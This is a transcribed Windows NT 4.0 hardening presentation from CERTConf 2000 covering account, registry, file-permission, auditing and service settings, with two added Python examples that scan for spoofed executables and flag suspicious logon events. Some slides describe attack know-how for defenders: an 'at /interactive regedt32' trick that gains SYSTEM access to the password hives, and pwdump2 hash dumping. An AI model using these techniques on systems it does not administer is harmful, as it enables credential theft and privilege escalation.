Hardening Systems: Windows NT

Stephen M. Nugen, CISSP
NebraskaCERT
smnugen@nugensoft.com

Presented to CERTConf 2000
September 28, 2000

Slide 1: Title

Slide 2: Introduction

• Purpose
  – Discuss Windows NT-specific InfoSec issues
  – Provide pointers to specific checklists, etc.
  – Focus
    • Windows NT 4.0
      – Still outselling Windows 2K
      – Next year: Windows 2K and/or Whistler (-> .NET)
      – Server and Workstation versions
    • Broad rather than deep...
      – Consider multiple areas of vulnerability
      – Some topics just too hard or too site-specific to cover with everything else...
    • Understanding the “why” behind the vulnerability, mitigation
      – Preparing for multiple variations on a theme
      – InfoSec is the journey that never ends

Slide 3: Introduction cont’d

• Caveat
  – Presenting and discussing information gleaned from multiple sources
    • Sources believed to be reliable
    • Some sources old... some details may be OBE depending on what service packs, patches, hot-fixes have been installed at your site
  – Some, but not all of these have been tested
  – Limitations of any single presenter...
  – IMPORTANT
    • USE THESE NOTES ONLY AS
      – IDEAS FOR FURTHER STUDY
      – POINTS OF REFERENCE... KEYWORDS FOR SEARCHING TECHNET, MSDN, ETC.
    • CHANGES TO REGISTRY VERY DANGEROUS
      – BACKUP REGISTRY FIRST
      – EXPLORE WITH REGEDT32.EXE... USE OPTIONS | READ-ONLY
      – DON’T TRUST NUGEN’S SPELLING, TYPE, OR VALUE FOR ANY PARTICULAR REGISTRY KEY, ETC.... LOOK IT UP

Slide 4: Introduction cont’d

• Assumed
  – Already understand InfoSec basics
  – Already understand Windows NT basics
• Style
  – Very informal
  – Questions and suggestions welcome anytime
    • Now
    • Later
• If you need the source for any specific suggestion/topic, send email to smnugen@nugensoft.com
  – Ask about abbreviations... like
    • HKLM = HKEY_LOCAL_MACHINE
    • HKCU = HKEY_CURRENT_USER

Slide 5: Introduction cont’d

• Structure
  – Accounts
  – Resources
  – Auditing
  – Services
  – Network
  – Other
  – OBE Exploits
  – Sources

Slide 6: Accounts

• Password Restrictions
  – Passwords should expire after <xx> days to limit scope of compromised password
  – Password length > 12 characters
    • For W9X systems, password length of 8 very bad since encrypted in 7-byte chunks
  – Password uniqueness
    • Don’t keep reusing compromised passwords
    • Set Password Uniqueness to remember maximum value (24)
    • Set Minimum Password Age to 2 days to prevent users from cycling through passwords to return to their “old favorite”
  – Use Account Lockout to prevent password guessing, brute force
    • Lockout after <4-5> bad login attempts
    • Reset count after <20-30> minutes
    • Lockout duration <30-forever>
      – If forever, then will need Administrator to restore account

Slide 7: Accounts cont’d

• Password restrictions cont’d
  – User must log on in order to change password... to require Administrator involvement for users whose passwords have expired
  – Password warning time
    • Default: NT begins warning users 14 days before password expires
    • Can change via HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
  – Misc advice
    • Constructing passwords... educating users
    • Don’t forget to self-crack passwords from time to time...

Slide 8: Accounts cont’d

• Account Policies... User Rights
  – Be guided by principles of
    • Least privilege
    • Separation of duties... illegal activity which requires collusion less probable, more likely to be detected
  – Consider
    • Which group memberships really necessary
    • Hours of use
    • Dial-in access...
    • Which servers users can access... be very concerned about people logging on from a computer in an unsupervised area
    • Account expiration... especially for test and temporary accounts
  – Some rights should not be assigned to any user
    • Act as part of the operating system
    • Create a token object
    • Debug programs... not auditable
    • Generate security audits
    • Replace a process level token

Slide 9: Accounts cont’d

• MS-recommended changes from default for high-security sites
  – Right: Log on locally
    • Workstations and stand-alone servers
      – Default: Administrators, Everyone, Guests, Power Users, and Users
      – Change: Remove Everyone and Guests
    • Domain servers
      – No change from default recommended
  – Right: Shut down system
    • Workstations and stand-alone servers
      – Default: Administrators, Everyone, Guests, Power Users, and Users
      – Change: Remove Everyone and Guests
    • Domain servers
      – No change from default recommended

Slide 10: Accounts cont’d

• MS-recommended changes from default cont’d
  – Right: Access this computer from network
    • Workstations and stand-alone servers
      – Default: Administrators, Everyone, Power Users
      – Change: Remove Everyone; Add Users
    • Domain servers
      – Default: Administrators, Everyone
      – Change: Remove Everyone; add Backup/Server/Print Operators
  – Also refer to MS Windows NT 4.0 Domain Controller Configuration Checklist

Slide 11: Accounts cont’d

• Account policies cont’d
  – Special considerations
    • Access this computer from network
      – Block for Everyone group
      – For all groups when possible... including administrator... so that administrators have to log in interactively at the server, in a controlled environment
    • Log on locally
      – Admins only... users shouldn’t be logging into actual server hardware
    • Take ownership of files and other objects
      – Admins only...
    • Manage auditing and security logs
      – Admins only...
      – See following note about Auditor account

Slide 12: Accounts cont’d

• Administrator account cont’d
  – Administrators need two separate accounts
    • Regular use, less-privileged
      – Not an insult
      – A precaution against accidental damage
    • System administration account
    • Win2K allows “execute as” like Unix “su”
  – ...Two separate accounts for other privileged accounts as well
    • Backup Operators, etc.

Slide 13: Accounts cont’d

• Administrator account cont’d
  – Rename Administrator account to something obscure
    • Exploit tools can still learn the name, but
      – It’s another barrier... more tools, knowledge, etc.
      – Some or all of them require the renamed administrator account be in use... the system administrator logged on
    • Be sure to scan the audit logs for logon attempts to Administrator account...
    • Be sure to hide last user name on logon via registry
      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DontDisplayLastUserName

Slide 14: Accounts cont’d

• Administrator account
  – Make a decoy Administrator account
    • No permissions
    • Waste the time of script kiddies
    • Audit...
  – Consider an Auditor account as only account in built-in Administrators group
    • All other Admins in special management group with every right except the “Manage auditing and security log” right
    • Allows auditing of most powerful accounts...
      – Most likely account to be misused, accidentally or deliberately
      – Most likely account targeted by disgruntled employee or external hacker

Slide 15: Accounts cont’d

• Administrator account cont’d
  – Recovery technique
    • Make obscure Administrator account with very complex password
    • Store password in thirds in three different envelopes entrusted to three different managers/employees
    • Audit...
  – Use PASSPROP to make Administrator account subject to lockout policy
    • From NTRK
    • Only locks remote access... not local

Slide 16: Accounts cont’d

• SYSKEY
  – aka System Key
  – Background
    • NT stores one-way hashes of user passwords in SAM registry
    • Saved by rdisk /s and some backup programs
    • Password cracking tools can dump encrypted passwords from archived SAM files... for subsequent cracking
  – SYSKEY encrypts the user password hashes with 128-bit key for added protection
  – Three modes
    • Auto Boot
      – System generates internal key and stores it on the system
      – Convenient for unattended startups
      – Not very secure
    • Floppy Boot
      – System generates random key and stores it on floppy
      – More secure
      – Must insert floppy to boot the system
      – If you lose the floppy, order pizza...
    • Password Boot
      – Administrator chooses password
      – Needed to boot
      – If you forget the password or lose the Administrator, order pizza...

Slide 17: Accounts cont’d

• SYSKEY cont’d
  – Notes
    • SYSKEY prevents SAM dumping with
      – Tool built into L0pht Crack 2.5
      – Tool pwdump
    • SYSKEY does not stop SAM dumping with tool pwdump2
      – Uses DLL injection techniques different than pwdump
      – Exploits weakness in SYSKEY encryption... reuse of the keystream
      – pwdump2 requires administrator access
      – SYSKEY increases the complexity and time required to crack password hashes

Slide 18: Accounts cont’d

• LANMAN (aka LanManager [LM])
  – LANMAN authentication for Windows 9x clients much weaker than Windows NT authentication
  – Set HKLM\System\CurrentControlSet\Control\LSA\LMCompatibilityLevel = X
  – Where:
    • X=0: Support NT and LM password forms
    • X=1: Use LM only if requested
      – Vulnerability since hack tools can still request weaker LANMAN authentication
    • X=2: Never use LM
      – Preferred
      – But no Win95/98 clients
• Consider disabling caching of logon credentials
  – Used for roaming profiles... leaves local copies
  – HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount

Slide 19: Resources

• Always format volumes as NTFS
  – FAT filesystems don’t support ACLs
• Shares
  – Share ACLs only restrict remote access, not access by programs on the same computer
    • Local access: Checks file & directory ACLs
    • Remote access: Checks
      – Share ACLs, then
      – File and directory ACLs
  – Share ACLs can’t be relaxed by share owners, but can be created and modified by
    • Full administrators
    • Server Operators
    • Power Users
    • Print Operators (create only)

Slide 20: Resources cont’d

• Shares cont’d
  – Don’t inadvertently put information in share name
    • Share names visible even to users who can’t access the share
    • Names like “Secret Layoff Schedule” best avoided

Slide 21: Resources cont’d

• Administrative shares (aka net shares)
  – Created automatically for each logical volume (e.g. C$, D$)
  – Hidden from view, but accessible
  – Helpful in remote administration
  – Disabled when Server service disabled
  – Disabled through registry keys
    • NT Server: HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\AutoShareServer
    • NT Workstation: HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\AutoShareWks
  – Can delete existing shares through net share /d
  – Multiple MS-KB articles on this subject...

Slide 22: Resources cont’d

• General access permissions
  – Start with the most sensitive directories and files...
  – Use tools for large systems
  – For shared directories and files
    • Which local users and groups have access... necessary and appropriate?
    • Which network users and groups have access... necessary and appropriate?
    • Are inherited permissions appropriate?
  – For non-shared directories and files
    • Which local users and groups have access... necessary and appropriate?
    • Are inherited permissions appropriate?
  – Override the default behavior that the Everyone group gets full access for all new folders...
    • Change Everyone group access for parent folder, then create subfolders which inherit permissions
    • Change Everyone group permissions at drive root... then propagate permissions to subdirectories
      – Exception: Manually update systemroot folder (usually C:\winnt)

Slide 23: Resources cont’d

• Separate data files from program files
  – Easier administration... backups
  – Data directories
    • Users given Write permissions
    • Remove Execute permission... to prevent user from writing trojan or virus into directory and then executing
  – Program directories
    • Users have Read and Execute permissions
    • Remove Write permissions... to prevent user from writing trojan or virus into directory and then executing
• Separate public files from private files
  – Easier to apply appropriate permissions and audit
• Never share the root directory of a drive
  – Exception: CD-ROM shared for public access
• Use encryption when feasible
  – Especially for exec laptops...

Slide 24: Resources cont’d

• MS recommendations for protecting files and directories
  – \winnt and all subdirectories... see exceptions that follow
    • Administrators: Full Control
    • System: Full Control
    • Creator Owner: Full Control
    • Everyone: Read
  – \winnt\repair... where rdisk stores info for ERD disks... includes sensitive info
    • Administrators: Full Control
  – \winnt\system32\config
    • Administrators: Full Control
    • System: Full Control
    • Creator Owner: Full Control
    • Everyone: List

Slide 25: Resources cont’d

• MS file recommendations cont’d
  – \winnt\system32\spool
    • Administrators: Full Control
    • System: Full Control
    • Creator Owner: Full Control
    • Everyone: Read
    • Power Users: Change
  – \winnt\cookies
    • Administrators: Full Control
    • System: Full Control
    • Creator Owner: Full Control
    • Everyone:
      – Special directory access: read, write, execute
      – Special file access: none

Slide 26: Resources cont’d

• MS file recommendations cont’d
  – \winnt\forms
    • Same protections as \winnt\cookies
  – \winnt\history
    • Same protections as \winnt\cookies
  – \winnt\occache
    • Same protections as \winnt\cookies
  – \winnt\profiles
    • Same protections as \winnt\cookies
  – \winnt\sendto
    • Same protections as \winnt\cookies
  – \winnt\temporary internet files
    • Same protections as \winnt\cookies

Slide 27: Resources cont’d

• MS file recommendations cont’d
  – \boot.ini
    • Administrators: Full Control
    • System: Full Control
  – \ntdetect.com
    • Administrators: Full Control
    • System: Full Control
  – \ntldr
    • Administrators: Full Control
    • System: Full Control
  – \autoexec.bat
    • Administrators: Full Control
    • System: Full Control
    • Everyone: Read

Slide 28: Resources cont’d

• MS file recommendations cont’d
  – \config.sys
    • Administrators: Full Control
    • System: Full Control
    • Everyone: Read
  – \temp directory
    • Administrators: Full Control
    • System: Full Control
    • Creator Owner: Full Control
    • Everyone:
      – Special directory access: read, write, execute
      – Special file access: none
• Also see specific guidelines from TSS & NSA, 1988

Slide 29: Resources cont’d

• Monitor ownership of sensitive files
  – Example: Administrators shouldn’t be accessing personnel evaluations
  – Owner should deny access to administrators
  – If necessary, Admin can take ownership... then grant themselves access rights
  – But Admins can’t give ownership back to original owner... so it leaves tracks
  – Data owner checks ownership... finds Admin is new owner... can ask the interesting questions
  – Doesn’t require auditing or access to audits by data owner

Slide 30: Resources cont’d

• Prevent remote registry editing
  – Stronger protection after SP3
  – Remote registry editing subject to the ACL on key HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg
    ...but HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths\Machine defines registry keys exempt from this restriction
  – See MS-KB Q153183
  – Default
    • NT Server defines key, restricts remote access to Administrators
    • NT Workstation doesn’t define the key, does not restrict remote access to the registry

Slide 31: Resources cont’d

• Disable registry tools when not required
  – Method-1: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
    • Directly or via policy editor
  – Method-2: Use ACLs to restrict use of registry editors
    • Weakness of this approach: Doesn’t restrict other registry-modifying tools, scripts, etc.

Slide 32: Resources cont’d

• C2-level protections
  – Full C2 the subject of multiple white papers, etc.
  – Investigate ProtectionMode
    • When present, tells the NT Session Manager that security on base system objects should be at the C2 security level
    • HKLM\System\CurrentControlSet\Control\Session Manager\ProtectionMode
    • Ref MS-KB Q244995
  – Also investigate additional protection
    • ProtectionMode doesn’t address all base named objects... for those, use HKLM\System\CurrentControlSet\Control\Session Manager\AdditionalBaseNamedObjectsProtectionMode

Slide 33: Resources cont’d

• Sensitive registry areas to control & monitor
  – Can be used to launch trojans
  – MS-recommended default ACLs for these registry keys
    • Administrators: Full Control
    • System: Full Control
    • Creator Owner: Full Control
    • Everyone: Read
  – HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  – HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  – HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
  – HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
  – HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Slide 34: Resources cont’d

• MS recommendations for changes to registry key permissions
  – Changes to default for Everyone group
    • Default for Everyone: Special Access with
      – Query Value
      – Set Value
      – Create Subkey
      – Enumerate Subkeys
      – Notify
      – Delete
      – Read Control

Slide 35: Resources cont’d

• MS registry recommendations cont’d
  – Changes for Everyone group cont’d
    • Change for Everyone Special Access
      – Retain
        » Query Value
        » Enumerate Subkeys
        » Notify
        » Read Control
      – Remove
        » Set Value
        » Create Subkey
        » Delete

Slide 36: Resources cont’d

• MS registry recommendations cont’d
  – Changes for Everyone group cont’d
    • Applies to
      – HKLM\Software
        » But don’t apply to entire subtree or some software may become unusable
      – HKLM\Software\Microsoft\RPC (and subkeys)
      – HKLM\Software\Microsoft\Windows NT\CurrentVersion
      – HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
      – HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
      – ... Too many to list... ref to MS Publication: Securing Windows NT Installation, Oct, 1997
    • Don’t forget keys
      – HKCR (root and all subkeys)
      – HKU\.DEFAULT

Slide 37: Resources cont’d

• Watch out for PATHs
  – System PATH variable must only contain directories whose ACLs prevent untrusted users from adding or modifying files
    • Such as executables and DLLs
    • Such as data files trusted programs rely on
  – User-level autoexec.bat files can be enabled
    • Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    • If enabled, then must protect autoexec.bat files
  – The “.” problem
    • Most commands and APIs search the current directory (“.”) before the directories specified in the controlled PATH variable
      – Command window
      – Scripts
      – APIs that start other programs
    • Allows untrusted programs/components/etc. to be accessed in place of trusted elements... spoofing

Slide 38: Resources cont’d

• Path cont’d
  – The “.” problem cont’d
    • Difficult to protect against...
    • Some advice
      – Use 3rd-party command shells if feasible
      – Routinely scan for executable files
        » *.exe, *.bat, *.com, *.vbs, etc.
        » Get real attentive when finding files whose name is the same as common commands, services, etc.
      – Avoid working in directories where users with lesser capabilities can create files, etc.
        » Especially important for Administrators
      – Where possible, use Start | Run... it does not search “.” before directories specified by system PATH

Slide 39: Resources cont’d

• DLL spoofing
  – Closely related to PATH issues
  – Goal of malicious user: cause their “special” DLL to be loaded instead of more boring DLL supplied by the operating system or trusted application
  – Difficulty-1: Rules used to load DLLs at boot time complex
    • Different for 16-bit and 32-bit DLLs
    • Trusted source disagrees with MS-KB article
    • Ref: MS-KB Q164501

Slide 40: Resources cont’d

• DLL spoofing cont’d
  – Difficulty-2: Different methods search different sequences of directories
    • Program directory
      – Where the executable resides
      – May not be protected by default, but should be protected by good Administrator
    • System directory
      – Ex: c:\winnt or c:\winnt\system32
      – Should be protected
    • Working directory...
      – Directory the user entered before starting the program
        » Protected?
      – Or, directory program places itself in
        » Known?
        » Protected?
      – DLL spoofing through working directories most serious vulnerability

Slide 41: Resources cont’d

• DLL spoofing cont’d
  – Safe locations for DLLs
    • DLLs in protected system directories
    • Application DLLs in same directory as application, suitably protected
  – Periodically scan for *.DLL files located outside of protected system and application directories
• Protect shortcuts
  – If a malicious user can change the properties of a shortcut...
  – System shortcuts (desktop and Start Menu) generally already protected inside Profile directory, private by default
  – Users should be cautioned not to create shortcuts in directories not write-protected from all others
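The two periodic scans recommended on slides 38 and 41 (executables named like common commands, and DLLs sitting outside protected directories) as one added example that is not part of the presentation; the directory tree, the list of protected roots and the list of common command names are all constructed for illustration.

```python
"""Scan a directory tree for the files slides 38 and 41 say to look for:
executables whose names shadow common commands, and DLLs living outside
the protected system and application directories.  Added example; the
sample tree is built in a temp directory so the script runs anywhere."""
import os
import tempfile
from typing import Dict, List, Tuple

# Extensions listed on slide 38; .dll is handled separately (slide 41).
EXEC_EXTENSIONS = {".exe", ".bat", ".com", ".vbs"}

# Assumed list of command names that deserve a second look when found in
# an unprotected directory; extend it with your own site's services.
COMMON_COMMANDS = {"cmd", "net", "regedit", "regedt32", "notepad",
                   "explorer", "xcopy", "at"}


def is_under(path: str, roots: List[str]) -> bool:
    """True if path lies inside any of the given protected root directories."""
    p = os.path.normcase(os.path.abspath(path))
    for root in roots:
        r = os.path.normcase(os.path.abspath(root))
        if p == r or p.startswith(r + os.sep):
            return True
    return False


def scan_tree(root: str, protected_dirs: List[str]) -> Dict[str, List[str]]:
    """Return {'shadowing': [...], 'stray_dlls': [...]} as '/'-separated
    paths relative to root, sorted for stable reporting."""
    findings: Dict[str, List[str]] = {"shadowing": [], "stray_dlls": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            stem, ext = os.path.splitext(name)
            ext = ext.lower()  # NT filesystems are case-insensitive
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            protected = is_under(full, protected_dirs)
            if ext in EXEC_EXTENSIONS and stem.lower() in COMMON_COMMANDS and not protected:
                findings["shadowing"].append(rel)
            if ext == ".dll" and not protected:
                findings["stray_dlls"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def build_sample_tree() -> Tuple[str, List[str]]:
    """Constructed layout: protected \\winnt and application directories
    plus a user-writable public area containing the suspicious files."""
    base = tempfile.mkdtemp(prefix="ntscan_")
    layout = [
        "winnt/system32/cmd.exe",            # real command, protected: fine
        "winnt/system32/kernel32.dll",       # DLL in protected dir: fine
        "apps/payroll/payroll.exe",          # application, protected: fine
        "apps/payroll/report.dll",           # application DLL beside it: fine
        "users/public/NET.EXE",              # shadows a common command: flag
        "users/public/notes.txt",
        "users/public/tools/helper.dll",     # DLL outside protected dirs: flag
        "users/public/login.bat",            # executable, but not a command name
    ]
    for rel in layout:
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("")
    protected = [os.path.join(base, "winnt"), os.path.join(base, "apps", "payroll")]
    return base, protected


def demo() -> Dict[str, List[str]]:
    """Build the sample tree and scan it."""
    base, protected = build_sample_tree()
    return scan_tree(base, protected)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```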

Slide 42: Resources cont’d

• Extension mapping
  – Can easily spoof when allowed to change the association between file types and system action
  – Single mapping should serve all users and only trusted programs whose executable files are properly protected
  – Problem-1: Anyone can change mapping
    • By default, all local users (members of INTERACTIVE pseudo-group) can modify the mapping through user tools
    • Mapping stored under HKLM\Software\Classes
    • Change permissions on this key
      – Replace Interactive group with one that holds only trusted users
      – Restrict non-Admin write access to the command key HKLM\Software\Classes\regfile\shell\open\command

Slide 43: Resources cont’d

• Extension mapping cont’d
  – Problem-2: Standard extensions can be dangerous
    • *.reg files contain scripts executed by registry editor, making changes to the registry
    • Consider disabling this association
      – To avoid surprises
      – Can always reassociate when needed... always record the existing association before changing it
    • For high-security environments, selectively unmap every association not required for normal operations
      – Very carefully, methodically, one or two at a time, with regression test scripts, etc.
      – Note: Executables can be run from command line, regardless of their file extension

Slide 44: Resources cont’d

• Watch out for data files containing more than data
  – Best-known example: Macro viruses embedded in a MS-Office file
  – Lesser-known example: OCX embedded in a .RTF file
  – Lesser-known example: NTFS streams...
    • NTFS files can contain multiple streams
    • Most tools only operate on Stream 0
    • Files can contain data in Stream 0; hacker tools in Stream 1; etc.
• Printer drivers
  – NT thoughtfully installs print drivers automatically as needed...
    • Untrusted print drivers could divert the data...
    • Restrict this ability to administrators, print operators and power users
    • HKLM\System\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers\AddPrinterDrivers

Slide 45: Resources cont’d

• Consider clearing the system page file during clean system shutdown
  – HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown
  – Increases duration of shutdown process
• Lock the server console when not in use
  – Explicitly
  – Password-protected locking screen savers
• Consider turning off auto-generation of 8.3 names
  – Filenames in 8.3 only needed for backward compatibility with 16-bit applications
  – Turning off improves performance (don’t know how much)
  – HKLM\System\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation

Page 46: Resources cont’d

• Consider removing the “R” permission from executable program files

– Benefit: prevents users from copying them (execute “X” permission alone is enough to run a program, but not to read or copy it)

• Perhaps to a directory of theirs that is searched before the system directories

• Effectively replacing a trusted component with an untrusted one

– Problem

• The desktop manager cannot determine the icon for such files

– May generate an audit entry if auditing failed reads

– Displays the default icon

Page 47: Resources cont’d

• Consider restricting the use of DCOM

– By default the Interactive group (any locally logged-on user) can write the RunAs value of DCOM servers, which selects the account a server runs as

• Key: HKLM\Software\Classes\AppID

• Remove the Interactive group’s Set Value, Create Subkey and Write permissions

• Replace permissions on existing subkeys

– Or disable DCOM altogether, since it can be used to execute commands remotely

• Value: HKLM\Software\Microsoft\Ole\EnableDCOM (REG_SZ, set to “N”)

Page 48: Auditing

• General notes

– Auditing enabled through User Manager | Policies | Audit

– Directory/file auditing by user (groups or accounts) controlled through Explorer

• Explorer | <select file> | <right-click> | Properties | Security | Auditing

– Printer auditing controlled through Print Manager

• Print Manager | <select printer> | <right-click> | Properties | Security | Auditing

– Auditing of base system objects requires a new registry value

• HKLM\System\CurrentControlSet\Control\Lsa\AuditBaseObjects (REG_DWORD, set to 1)

• Then enable “Object Access” auditing using User Manager

Page 49: Auditing cont’d

• General notes cont’d

– Even with “Use of User Rights” auditing on, certain privileges are not audited

• To control the size of the audit logs

• Ex: Backup and Restore privileges

• If required in special circumstances, check out HKLM\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing

Page 50: Auditing cont’d

• Set log size reasonably large

– Depends on granularity of auditing, activity level, etc....

– Experiment... 4096 KB and 8192 KB are commonly-cited sizes... monitor

– Consider placing event logs in separate partition(s) so they never fail because of insufficient disk space

• HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\File

• HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\File

• HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\File

• Enable log wrapping with “Overwrite Events as Needed”

– Goal: overwrite needn’t happen with good maintenance and archiving

• Routine log maintenance

– Monitor size

– Move to long-term storage

– Clear

– Know chain-of-evidence rules

Page 51: Auditing cont’d

• Special case: Security Log...

– Some experts recommend never allowing the Security Log to overwrite

• Better to crash than give a hacker a crude method of covering their tracks

• Technique

– Set “Do Not Overwrite Events”

– Establish registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\CrashOnAuditFail (REG_DWORD, set to 1)

• Recovery

– When the log fills, NT halts and sets CrashOnAuditFail to 2, which allows only Administrators to log on

– Restart computer

– Logon as local administrator

– Use Event Viewer to clear all events from the security log (archive them first)

– Reset HKLM\SYSTEM\CurrentControlSet\Control\Lsa\CrashOnAuditFail to 1

– Restart computer

– Ref MS-KB Q140058

– Other experts recommend against this auto-crash since it provides a straightforward DoS: anyone who can generate audited events can fill the log

Page 52: Auditing cont’d

• Event logs can be compromised

– Malicious users with access to powerful accounts can remove traces of their involvement

– A new tool claims the ability to make selective fine-grain modifications to the event logs

• Requires administrative rights

• See ntbugtraq for details

– So why audit: good defense consists of multiple hurdles, layers

• Restrict viewing of system and application event logs

– Low value...

– HKLM\System\CurrentControlSet\Services\EventLog\[LogName]\RestrictGuestAccess (REG_DWORD, set to 1)

– Remember to set security protections on the key as well, or the value can simply be changed back

• Consider network time-synch so events can be correlated across machines

Page 53: Auditing cont’d

• Auditing for specific threats... examples

Threat                                            Corresponding events to audit
break-in using random passwords (brute-force)     logon and logoff: failures
break-in using stolen password                    logon and logoff: success (...)
misuse of administrative privileges by            use of user rights; user & group management;
  authorized users                                security policy changes; restart, shutdown
virus outbreak                                    write access to targeted program files and
                                                  document templates
improper access to sensitive files                file- and object-access failures for Everyone;
                                                  and/or access successes for suspect users/groups
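The table above maps threats to audit categories. As an added example (not part of the original deck), here is that mapping turned into detection logic run over Security Log records. The event IDs are the NT 4.0 ones (528 successful logon, 529 failed logon, 612 audit policy change, 624 user account created, 636 member added to a local group); the thresholds, the record layout (minute, event ID, account, workstation) and the sample events are this example’s own assumptions, constructed for illustration.

```python
"""Detection rules for the threat table, run over NT 4.0 Security Log records.

Added example, not from the deck. Event IDs are the NT 4.0 ones; the
thresholds, the record layout and the sample events are assumptions.
"""
from collections import defaultdict

LOGON_SUCCESS = 528
LOGON_FAILURE = 529
ADMIN_EVENTS = {
    612: "audit policy changed",
    624: "user account created",
    636: "member added to local group",
}


def detect(events, fail_threshold=5, window_minutes=10, guess_min_failures=3):
    """Return alerts as (rule, subject, minute) tuples.

    events: iterable of (minute, event_id, account, workstation), any order.
    Rules (one per table row the log can answer):
      brute-force        : `fail_threshold` failed logons from one workstation
                           within `window_minutes` (fires when the count is hit)
      guess-then-success : a successful logon for an account that saw at least
                           `guess_min_failures` failures in the window before it
      admin-activity     : any user/group management or policy-change event
    """
    failures_by_ws = defaultdict(list)
    failures_by_acct = defaultdict(list)
    alerts = []
    for minute, event_id, account, workstation in sorted(events):
        if event_id == LOGON_FAILURE:
            failures_by_ws[workstation].append(minute)
            failures_by_acct[account].append(minute)
            recent = [m for m in failures_by_ws[workstation] if minute - m <= window_minutes]
            if len(recent) == fail_threshold:
                alerts.append(("brute-force", workstation, minute))
        elif event_id == LOGON_SUCCESS:
            recent = [m for m in failures_by_acct[account] if minute - m <= window_minutes]
            if len(recent) >= guess_min_failures:
                alerts.append(("guess-then-success", account, minute))
        elif event_id in ADMIN_EVENTS:
            alerts.append(("admin-activity", "%s: %s" % (account, ADMIN_EVENTS[event_id]), minute))
    return alerts


# Constructed sample: a password-guessing run from WS-EVIL that eventually
# succeeds, followed by a group-membership change; WS-01 is normal activity.
SAMPLE_EVENTS = [
    (1, 529, "administrator", "WS-EVIL"),
    (2, 529, "administrator", "WS-EVIL"),
    (3, 528, "jdoe", "WS-01"),
    (3, 529, "administrator", "WS-EVIL"),
    (4, 529, "backup", "WS-EVIL"),
    (5, 529, "backup", "WS-EVIL"),
    (6, 529, "administrator", "WS-EVIL"),
    (7, 528, "administrator", "WS-EVIL"),
    (8, 636, "administrator", "WS-EVIL"),
    (9, 529, "jdoe", "WS-01"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The brute-force rule keys on the source workstation rather than the account, because a guessing tool rotates through accounts; the guess-then-success rule is the cheap stand-in for the “stolen password” row, since a real logon that follows a burst of failures for the same account deserves a look regardless of who claims to own it.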

Page 54: Auditing cont’d

• DII-COE minimum audit requirements

– Logon [F,S]

– Logout [F]

– Use of privileged commands [F,S]

– Application and session initiation [F,S]

– Use of print command [F,S]

– Discretionary access control permission modification [F,S]

– Export to media [S]

– Unauthorized access attempts to files [F]

– System startup and shutdown [F,S]

Notation: S = Success, F = Failure

Page 55: Auditing cont’d

• Auditing access to password DB

– Goal: ensure notification through the Event Log of failed and successful access to the sensitive password DB (the SAM and SECURITY hives)

– Ref: MS KB article Q186374

– Ensure auditing is enabled (via User Manager | Policies)

– Trick:

• The SAM and SECURITY hives are not readable even by Administrators, so the registry edits have to be made within the SYSTEM security context

• Start the Schedule service (running as System) via Control Panel | Services

• At a command prompt: at <time> /interactive "regedt32.exe", where <time> is the current time plus a minute or so

• regedt32 run this way has access to the entire registry, including the SAM and SECURITY hives

– So, be very, very careful

• Works only for the local registry

Page 56: Auditing cont’d

• Auditing access to password DB cont’d

– Audit changes to the SAM key

• Navigate to HKEY_LOCAL_MACHINE | SAM

• Select Security | Auditing | Add | Show Users

• Add SYSTEM, Domain Admins, Administrator, Backup Operators and other groups as needed (see KB article)

• Select “Audit Permission on Existing Subkeys”

• Select Success and Failure checkboxes for

– Query Value

– Set Value

– Write DAC

– Read Control

– Audit changes to the SECURITY key

• Navigate to HKEY_LOCAL_MACHINE | SECURITY

• Repeat the same steps as for SAM

– Exit the registry editor, stop the Schedule service

Page 57: Services

• Introduction

– Services started at boot

– Usually run in the background

• Servicing requests from user programs

• Servicing requests received from the network

– Managed, by Administrators, from Control Panel | Services

– Typically use the built-in, powerful SYSTEM account

– Often assume the identity of the requesting client (impersonation), thus gaining capabilities beyond the service’s own account

• Best advice: strictly limit the services that run on any given computer

Page 58: Services cont’d

• Restrict the ability to install services

– Default allows Server Operators to install services

– A service is installed by creating a subkey under HKLM\System\CurrentControlSet\Services; restrict installation to full Administrators by ensuring that only Administrators and SYSTEM can create subkeys and write there

• Restrict scheduling capabilities

– Consider removing the value HKLM\System\CurrentControlSet\Control\Lsa\SubmitControl

• It allows Server Operators to submit Schedule (AT) jobs

• Since AT jobs run as SYSTEM, it also allows Server Operators to expand their capabilities to full Administrators

– Restrict access to HKLM\System\CurrentControlSet\Services\Schedule

• To the same users/groups allowed to submit jobs to the Schedule service

Page 59: Services cont’d

• Restrict FTP

– Default account is Guest

• Which should already be disabled

• Configure a new account with a password, not a member of any privileged groups

• Configure the home directory carefully...

– The FTP server exports entire disk partitions

